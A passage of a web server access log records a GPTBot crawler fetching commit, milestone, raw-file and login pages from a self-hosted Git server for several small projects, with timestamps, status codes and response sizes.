+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones" +[17/Feb/2026:15:31:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?q=&sort=furthestduedate&state=open" [Client 74.7.227.38] [Length 8491] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones" +[17/Feb/2026:15:31:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 12755] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host" +[17/Feb/2026:15:31:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 13624] [Gzip 4.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host" +[17/Feb/2026:15:31:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 1981] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/3.conf" +[17/Feb/2026:15:31:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/keys.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/keys.json" +[17/Feb/2026:15:31:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/keys.json" +[17/Feb/2026:15:31:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/README.md?display=source" [Client 74.7.227.38] [Length 11761] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/README.md" +[17/Feb/2026:15:31:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?q=&sort=furthestduedate&state=open" [Client 74.7.227.38] [Length 8504] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones" +[17/Feb/2026:15:31:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?q=&sort=furthestduedate&state=open" [Client 74.7.227.38] [Length 8501] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones" +[17/Feb/2026:15:31:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/OpcConnectionTest.csproj?display=source" [Client 74.7.227.38] [Length 11547] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/OpcConnectionTest.csproj" +[17/Feb/2026:15:31:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/OpcConnectionTest.csproj?display=rendered" [Client 74.7.227.38] [Length 10931] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/OpcConnectionTest.csproj" +[17/Feb/2026:15:31:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/start.sh?display=source" [Client 74.7.227.38] [Length 14942] [Gzip 4.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/start.sh" +[17/Feb/2026:15:31:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer?tab=repositories" [Client 74.7.227.38] [Length 8153] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer" +[17/Feb/2026:15:31:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 12483] [Gzip 7.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/2.conf" +[17/Feb/2026:15:31:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/2.conf" +[17/Feb/2026:15:31:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html?display=source" [Client 74.7.227.38] [Length 16437] [Gzip 5.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html" +[17/Feb/2026:15:31:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fdist%2fAssetPilot.exe" [Client 74.7.227.38] [Length 20801] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/AssetPilot.exe" +[17/Feb/2026:15:31:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=PythonTest%2fmy_database.db" [Client 74.7.227.38] [Length 24116] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/my_database.db" +[17/Feb/2026:15:31:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=furthestduedate&state=closed" [Client 74.7.227.38] [Length 8506] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?q=&sort=furthestduedate&state=open" +[17/Feb/2026:15:31:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?files=PostgresMonitor%2fwatchdog.py.old" [Client 74.7.227.38] [Length 24329] [Gzip 6.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py.old" +[17/Feb/2026:15:31:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:15:31:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:15:31:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:15:31:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:15:31:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:15:31:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:15:31:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:15:32:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:15:32:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 11556] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:32:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?q=&sort=mostcomplete&state=closed" [Client 74.7.227.38] [Length 8512] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?sort=furthestduedate&state=closed" +[17/Feb/2026:15:32:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?q=&sort=mostissues&state=closed" [Client 74.7.227.38] [Length 8512] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?sort=furthestduedate&state=closed" +[17/Feb/2026:15:32:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?q=&sort=leastissues&state=closed" [Client 74.7.227.38] [Length 8511] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?sort=furthestduedate&state=closed" +[17/Feb/2026:15:32:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?q=&sort=furthestduedate&state=closed" [Client 74.7.227.38] [Length 8508] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?sort=furthestduedate&state=closed" +[17/Feb/2026:15:32:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?q=&sort=leastcomplete&state=closed" [Client 74.7.227.38] [Length 8506] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?sort=furthestduedate&state=closed" +[17/Feb/2026:15:32:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?q=&sort=closestduedate&state=closed" [Client 74.7.227.38] [Length 8508] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?sort=furthestduedate&state=closed" +[17/Feb/2026:15:32:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?files=html%2findex.html" [Client 74.7.227.38] [Length 20231] [Gzip 3.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" +[17/Feb/2026:15:32:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/status.json?display=source" [Client 74.7.227.38] [Length 11072] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/status.json" +[17/Feb/2026:15:32:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11867] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/tsconfig.json" +[17/Feb/2026:15:32:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/package.json?display=source" [Client 74.7.227.38] [Length 11682] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/package.json" +[17/Feb/2026:15:32:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 10424] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:15:32:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:15:32:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/i18n.js?display=source" [Client 74.7.227.38] [Length 24522] [Gzip 5.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/i18n.js" +[17/Feb/2026:15:32:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt" [Client 74.7.227.38] [Length 10089] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal" +[17/Feb/2026:15:32:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:32:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:32:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:32:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:15:32:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:15:32:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.gitignore" +[17/Feb/2026:15:32:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/PostgresPatrol/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" +[17/Feb/2026:15:32:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/PostgresPatrol/README.md" +[17/Feb/2026:15:32:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10945] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/services/geminiService.ts" +[17/Feb/2026:15:32:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 9950] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/1.conf" +[17/Feb/2026:15:32:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 9949] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/4.conf" +[17/Feb/2026:15:32:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/letsencrypt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt" +[17/Feb/2026:15:32:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 